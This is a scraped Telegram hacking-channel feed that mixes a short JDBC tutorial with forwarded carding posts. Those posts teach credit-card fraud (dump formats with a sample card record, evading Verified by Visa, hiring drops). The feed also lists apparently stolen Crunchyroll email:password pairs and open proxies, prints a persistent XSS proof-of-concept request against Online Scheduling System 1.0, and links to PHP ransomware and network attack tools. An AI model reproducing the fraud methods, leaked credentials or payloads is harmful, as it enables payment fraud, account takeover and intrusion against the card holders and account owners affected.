UNDERCODE COMMUNITY
2.69K subscribers
1.23K photos
31 videos
2.65K files
80.7K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
πŸ¦‘In this exercise you have done what

in this exercise, you write a register of Registration Servlet method. This method uses JDBC to create a new customer number and register a new customer to the database. Now you have the basic knowledge to access the database in your servlets.



πŸ¦‘Answer

the following code to create a SQL statement, execute SQL queries defined on the preceding page.



// Get next customer number

Statement sqlStatement = conn.createStatement ();

ResultSet result = sqlStatement.executeQuery ("SELECT MAX (CUSTNO) FROM" + DBOWNER + ". CUSTOMER");

The result of the query is placed inside the ResultSet object called result. The resulting set contains a cursor that initially points before the first row returned. In order to get the value of the query, the cursor must be moved forward with next (). With this method, the cursor can only move forward. The following lines move the cursor to the returned value and increase by 1.

int nextId = 0;

if (result.next () = = true)

{

nextId = result.getInt (1) +1;

}

if check to determine whether there are rows to be returned. If not, the result is false. We don't handle error cases, but it can simply be handled by setting nextId to 1. We can also use the ResultSet method getInt (String), the column name is "CUSTNO", but because we know that only one column will be returned, we chose to use getInt (int)

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘ Access a database with JDBC FULL BY UNDERCODE
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
This media is not supported in your browser
VIEW IN TELEGRAM
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ CARDING FOR BEGINERS :


1) CC - Cardboard
These terms mean information about the credit card or the credit card itself.
Cardboard example:
4916478867239017 | 6/2014 | 370 | Elizabeth Hutton | 3071 Joanne Lane | Lexington | MA | 2173 | COLOMBIA | 12-26-4682 || 6/30/1988 |

4916478867239017 - credit card number.
6/2014 is an expiration date or in translation: card expiration date.
370 - CVV2 or card security code.
Elizabeth Hutton - first and last name of the card holder.
3071 Joanne Lane - cardholder’s street of residence.
Lexington is a cardholder city. (cardholder - cardholder)
MA - state of the owner of the credit card .
2173 - zip cod, postal cod or postal code of the card holder.
COLOMBIA - country of residence of the cardholder.
12-26-4682 - the phone number of the owner.
6/30/1988 - year of birth of the cardholder.

2) This ss is written in a convenient form and everything is clear on it, but the seller of the material can give ss in a bad format without separation, so I advise you to check with the sellers in what format they sell ss before buying.

3) You need to know one thing to easily distinguish cardboard.
Remember:
if the card number starts at 4 - this is VISA, if the card number starts at 3 - this is American expres, if the card number starts at 5 - this is MASTERCARD.

Possessing even this little information can be done by driving into Skype, Steam, online stores, etc.

πŸ¦‘ Add. Information:
1. The balance on a regular ss is never known. (there are special checkers, but there are only a few, and most usually kill a card in 90%)
2. The security code for MASTERCARD and VISA consists of three digits, for American expres of 4.
3. For MASTERCARD and VISA, the card number consists of 16 digits, for American expres of 15.
4. Not all ss staff can be written completely, very often it is marked with two letters, examples: IA, AR, DE, etc. - to find out the state, I gave at the end of the article a table for deciphering the names of the states.

You can also come across things like full ss or enrol. Now I will tell you what it is.
Full cc is a card with additional information such as:
SSN - Social Security number in translation is the cardholder insurance number
DOB - date of birth - date of birth of the cardholder
MMN - mother's maiden name or mother's maiden name

4) There may also be soap, a phone number and the bank that issued the credit card. But all this data is sometimes found on ordinary maps.
The main goodies are SSN and DOB. Full ss needs to make enrol, i.e. create an account in a bank. For this, additional information about SSN and DOB is needed.
Cards are usually rolled in order to find out the card balance and gain access to change billing addresses. And now what is all this for?
about balance I think everything is clear, here about billing - I think not everyone and even more it is not clear why it should be changed at all. So, billing address is the address of the card holder. The fact is that when registering in the online store there are two such concepts as Billing adress (owner address) and shipping adress (delivery address). If they differ, then the order is checked more thoroughly in the case when they coincide (the goods will be sent within 2 hours)
Thus, for example: we have a usa shop and a usa ss, as well as a drop in the usa, we make a video change the billing address of the cardholder to the drop address and then order goods at a billing address and everything is ok. But in reality, of course, not everything is so simple. It’s not so easy to change the billing address, but at least you have to accept the dialer and have the MMN info - and that’s at least. So draw conclusions)) Well, generally we will not bother with enrols, this is just for general development.

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Extra credit card protections:
t.me/UndercodeTesting


1) Every day, bank specialists work hard to make life difficult for carders. And then one day they came up with VBV - Verified by Visa.

2) The essence of the system is that when paying for goods or services on the Internet, you must enter an additional verification code, which the cardholder receives from the bank that issued the card. However, this does not solve the problem of payment security.

3) The problem is that the client cannot prohibit transactions that are not protected Verified by Visa. And even paying only in those online stores where Verified by Visa is used, the client can easily steal data (card number, owner name, expiration date, cvv2 code) sufficient to make legal payments on behalf of the client.

4) In short: VBV is an additional protection for visa cards (requires a password when paying) there are cards with and without VBV - some sellers check for VBV. If you bought from a seller who does not check for VBV and it turned out to be with VBV, then such a card can only be thrown out. Therefore, check with the sellers.

5) As you understand, VBV is an additional protection for visa cards. The master card has a similar protection called SECURITYCODE. Brand credit cards - American Express - have nothing of the kind!

6) That's probably all about carring today. In the next article on carring, I will write on the topic of drops, the search for retreating shops and the breakdown of additional information.
In the meantime, a small glossary of terms:

CC - credit card
information Fulka - great credit card information
Kartholder - the legal owner of the card.
Shop - online store.
Ship - the process of buying a product in an online store using the stolen credit card information.
Drop - the person on whom you do the spike of the staff or do the bay (bank transfer).
Seller - seller of the material necessary for the cardholder
Drive in - enter information about card when paying for the goods. (One of the rules for successful driving: you need to enter it and not copy it)
Staff - product

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ DROPPING CARDING _BEGINERS :

Drops

πŸ¦‘ To begin with, let’s define what a drop is:

1) Drop is a dummy who throws dirt at it. For example, a drop under a staf will accept goods hissed
in the store for someone else's credit card, and then it will send you a percentage. Drops are staf, cash out, bay,
receive SMS, etc. In general, wherever you want to shine, you can hire a drop.

2) Also, with the help of drops in
Europe, for example, or the USA, it is possible to solve problems with shops (in the clothing store) if you could not find a shop that sends
to Russia, but it sends for example to Germany, then a drop in Germany will solve the problem. Similarly, for receiving SMS well,
etc.

3) It should also be noted that if for bays and receiving SMS, drop should be in a certain country, then for
luggage can be taken drop in Raska and in the USA / Europe. But the probability that they will be sent to the USA / Europe
without problems is higher than the probability that they will be sent to Raska without problems.

4) Now I think it’s clear that in the luggage carrier they are looking
not so much for safety, but for a successful drive-in. Another important point about drops, they are of
two types:

adjustable;
non-adjustable.
Divorced people have no idea what violates the law, such drops often have problems.

Non-divorceable - a person knows that he is breaking the law and follows safety measures.
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ CARDING -BEGINERS _Where to find these drops?
fb.com/UndercodeTesting

1) Look for Carrion Forums at Dropovodov (be sure to look for people with a reputation). Dropouts are people who have a certain number of drops. When concluding a deal with a drop driver, specify what kind of drops he has, adjustable or not.

2) The second is the principle of the drops. There are different options for different types of drops. If everything is clear with the SMS receiver, you pay him, he receives SMS and everything is buzzing, then there are a lot of options with the thingie. For example, there are drop traders who pay for goods on a track or after sale, some who send for%, and some who take with a staff (for example, 2 phones of one brand hissed, he takes one and sends it to you).

3) You can search for drops yourself. For example, in the same forums, look for messages from people who are ready to work with drops, but I would not recommend this option to you since you are likely to be thrown.

4) You can search for drops, for example, on forums about additional earnings (naturally search in the country in which you need a drop).


πŸ¦‘ Well, sort of sorted out, we move on.

Having broken through additional credit card information.

Why is this information actually needed? And what is she like?

Well, first you need to say that the more you know the better and calmer you work. In carding,
everything is really tied around information of various kinds.

So let's give a couple of new definitions:

Bank emitent - a bank that issued a card to which it belongs and which controls the card.

Bean - the first six digits of the card number, by which you can determine the following: bank emitet, card type, card level, card brand.

Information about the bin can be punched, for example, here: www.bindb.com

Having visited the site, you will immediately understand. There is one great button, Bin Search, which after entering the captcha will tell you everything =)

Example of outputting bin information:

Bin: 371740
Card Brand: AMEX
Issuing Bank: AMERICAN EXPRESS COMPANY US
Card Type: CREDIT
Card Level:
Iso Country Name: UNITED STATES
Iso Country A2: US
Iso Country A3: USA
Iso Country Number: 840
Bank's website: www.americanexpress.com/us/
Customer Care Line: 1-800-528-4800
Bank Address: **** [?] Available on Ultimate Database
Formal Bank: *** * [?] Available on Ultimate Database
Aditional Info: The
map is a little crooked but it's not scary, I'm sure you will see and try it yourself later.

Card Level in translation sounds like a card level. The fat content of the card depends on the level of the card, the higher the level, the more likely it is that the card is with a large balance.

Well, sort of figured it out too) Next!

Since I can’t describe the topic of bays and others, in this article I will describe the topic of searching for retreating shops (for a thing).

WRITTEN BY UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from TARJETAS PRO UNDER CARDING
πŸ¦‘ FULL CARDING FOR BEGINER BY UNDERCODE
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ¦‘ OUR YOUTUBE CHANNEL :

Youtube.com/UNDERCODE
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ BEST NEW VIRTUAL PHONE NUMBERS FOR MANY AREA CODES 2020 -

> LIST 1 : https://t.me/UnderCodeTesting/3115

> LIST 2 :

1) https://www.8x8.com/

2) https://www.freshworks.com/freshcaller-cloud-pbx/

3) https://cloud.google.com/voice/ > still good rated in 2020

4) https://grasshopper.com/remote-work-tools/

5) https://www.line2.com/

6) https://www.nextiva.com/

7) https://www.phone.com/

8) https://www.ringcentral.com/

9) https://www.virtualphone.com/

10) https://www.vonage.com

Written by undercode
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ FRESH PREMIUM PROXIES :


150.129.151.62 6666 1 hour ago
5052 ms 3% (80) in India - Adipur Elite -
167.172.165.90 3128 1 hour ago
2739 ms 9% (83) gb United Kingdom Elite -
103.21.163.70 6666 1 hour ago
3983 ms 15% (75) in India - Surendranagar Elite -
113.252.95.19 8197 1 hour ago
775 ms 16% (71) hk Hong Kong - Kowloon Elite -
139.196.120.52 443 1 hour ago
2006 ms 67% (51) cn China - Hangzhou Elite -
139.255.123.194 4550 1 hour ago
3308 ms 13% (80) id Indonesia - Jakarta Elite -
159.138.20.247 80 1 hour ago
3072 ms 21% (78) hk Hong Kong Elite -
144.76.214.159 1080 1 hour ago
3098 ms 54% (64) de Germany Elite -
144.76.214.153 1080 1 hour ago
3034 ms 65% (59) de Germany Elite -
47.99.145.67 808 1 hour ago
1872 ms 12% (77) cn China - Hangzhou Elite -
5.189.246.226 8080 1 hour ago
996 ms 60% (99) ru Russia Elite -
51.15.179.176 8118 1 hour ago
480 ms 8% (67) fr France Elite -


46.99.255.235 8080 1 hour ago
3563 ms 20% (77) al Albania Elite -
101.4.136.34 8080 1 hour ago
1099 ms 40% (60) cn China Elite -
58.97.72.83 8080 1 hour ago
2713 ms 19% (79) th Thailand - Chachoengsao Elite -
60.190.250.120 8080 1 hour ago
4038 ms 8% (79) cn China - Hangzhou Elite -
183.166.250.164 4216 1 hour ago
4278 ms 63% (43) cn China Elite -
185.252.144.77 80 1 hour ago
3955 ms 4% (96) fi Finland Elite -
188.40.183.189 1080 1 hour ago
3271 ms 56% (65) de Germany Elite -
186.0.176.147 80 1 hour ago
3500 ms 31% (68) ar Argentina - El Calafate Elite -
36.250.156.118 9999 1 hour ago
0 ms 0% (90) cn China - Putian Elite -
223.68.190.130 8181 1 hour ago
2237 ms 27% (78) cn China - Yangzhou Elite -
139.196.120.52 8080 1 hour ago
1425 ms 64% (44) cn China - Hangzhou Elite -
159.138.21.170 443 1 hour ago
4606 ms 18% (78) hk Hong Kong Elite -
173.192.128.238 9999 1 hour ago
152 ms 99% (53) us United States - Seattle Elite -
140.227.174.216 1000 1 hour ago
2573 ms 18% (89) jp Japan Elite -
36.91.97.228 8080 1 hour ago
2842 ms 9% (101) id Indonesia Elite -
202.77.127.98 3128 1 hour ago
3140 ms 21% (62) id Indonesia - Jakarta Elite -
103.123.171.214 83 1 hour ago
2938 ms 16% (76) bd Bangladesh Elite -
103.216.82.190 6666 1 hour ago
4152 ms 11% (76) in India - Ahmedabad Elite -
118.193.34.56 8080 1 hour ago
1583 ms 20% (78) cn China Elite -
106.104.12.236 80 1 hour ago
2553 ms 38% (69) tw Taiwan - Hsinchu Elite -
188.40.183.187 1080 1 hour ago
3692 ms 62% (60) de Germany Elite -
200.70.22.74 8080 1 hour ago
2832 ms 27% (52) ar Argentina - Rosario Elite -
213.230.90.108 3128 1 hour ago
1009 ms 5% (96) uz Uzbekistan Elite -
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Crunchyroll Premium Accounts verified:

zechad@shaw.ca:aeG1s504 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:21:10 AM
zeta.exe12341234@gmail.com:extirminator1 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:21:12 AM
ajtran2005@gmail.com:Aidan123 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:21:20 AM
benn0730@gmail.com:Rumford000 |Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:21:36 AM
ccacosta@gmail.com:abcf1981 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:21:46 AM
cocojade123@gmail.com:felis001 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:21:51 AM
debonnet.jonas@hotmail.com:Ikbenjhony1221 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:21:57 AM
kaxorian@yahoo.com:Himself99 : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:22:33 AM
linkevichb@gmail.com:hockeyplayer24 | Access = fan | Premium = anime|drama|manga | Expires = 5/31/2020 2:22:39 AM
kylekolberg1@gmail.com:9f504hmw | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:22:39 AM
londonsurdyk@gmail.com:Surdyk17! | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:22:41 AM
psic196@gmail.com:nempenses123 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:23:00 AM
roydel.pinder19@gmail.com:Panama05 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:23:06 AM
vermontnilsson9@gmail.com:l33tsupah4x0r | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:23:28 AM
victorrulz@yahoo.com:Funny123 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:23:28 AM
Gtjeffords1@gmail.com:Thomas2002 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:23:37 AM
davedsone@gmail.com:rh0mb01d | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:24:09 AM
david_spam0211@hotmail.com:david0211 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:24:10 AM
dovesareformen@gmail.com:Caprichosa1 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:24:14 AM
henriksen.kasey@gmail.com:Khenri22 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:24:30 AM
leonsamuelsen@gmail.com:Sommer00 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:24:59 AM
luisleetrevino@gmail.com:luislee1 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:25:03 AM
magnuskingos@gmail.com:Juli1990 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:25:04 AM
masonjordan5@gmail.com:milo1234 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:25:06 AM
maxdei456@gmail.com:Legoland456 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:25:07 AM
moeaziz377@gmail.com:badman377 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:25:11 AM
raptorrulesall@gmail.com:rowan1204 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:25:21 AM
rushi.chereddy@gmail.com:Kyloren456 | Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:25:25 AM
andr3s.ayala1@gmail.com:andres02 | : Access = premium | Premium = anime|drama|manga | Expires = 5/31/2020 2:26:02 AM

πŸ¦‘ SEND LOGINS SCREANSHOATS TO @uNDERCODE_testing

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
This media is not supported in your browser
VIEW IN TELEGRAM
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘# Exploit Title: Online Scheduling System 1.0 - Persistent Cross-Site Scripting TESTED BY UNDERCODE - TESTING
pinterest.com/undercode_Testing

# Date: 2020-04-30
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-scheduling-system.zip
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4
# Vulnerability Info:
# Online Scheduling System v1.0 suffers from an authenticated persistent cross-site scripting vulnerability. This Proof of Concept (PoC) will cause all users of the system, with read access to the courses, to execute arbitrary client-side code when viewing the 'Home' and 'List' tabs within the web application. The application fails to sanitize arguments supplied by the user before inserting them into the SQL database.

# Vulnerable Source Code
## /add.cor.php
14 $Course_Code = $_POST['corcode'];
15 $Course_name = $_POST['corname'];
16
17 $sql = "INSERT INTO course (Course_Code, Course_name) VALUES ('$Course_Code', '$Course_name')";

# Malicious POST Request
POST /Online%20Scheduling%20System/add.cor.php HTTP/1.1
Host: 172.16.65.130
Referer: http://172.16.65.130/Online%20Scheduling%20System/addcourse.php
Content-Type: application/x-www-form-urlencoded
Connection: close
Cookie: PHPSESSID=8o12pka3gvais768f43v5q4d60

corcode=XSS-101&corname=%3Cscript%3Ealert%28%22XSS-101%22%29%3B%3C%2Fscript%3E&submit=

@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Bug7sec Team - ransomware open source (web) .php
We are for you to be careful on Ransomware v1 and v2 files because the code is malicious
> https://github.com/bug7sec/Ransomware
Forwarded from TARJETAS PRO UNDER CARDING
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Best bin checkers sites :

https://iinbinlist.com/

https://www.creditcardrush.com/bin-checker/

https://www.freebinchecker.com/

https://www.bankbinlist.com/

https://www.exactbins.com/

▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Awesome hacking 2020 :
t.me/UndercodeTesting

ARP Poisoning
ARP Sniffing
DHCP Discover
DHCP Starvation
Fake FTP Server
LAND Attack
SNMP Cracking
Subdomains Identification
SSL/TLS Certificate Cloner
SYN Flooding
TCP Flags Analysis
TCP ISN Analysis
TCP Port Scan
Username check on social networks
Virtual Hosts Identification
Web Techonologies Identification

πŸ¦‘ all in one script for any linux distro :

1) git clone https://github.com/fportantier/habu.git

2) cd habu then run esetup or


>$ pip3 install habu
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁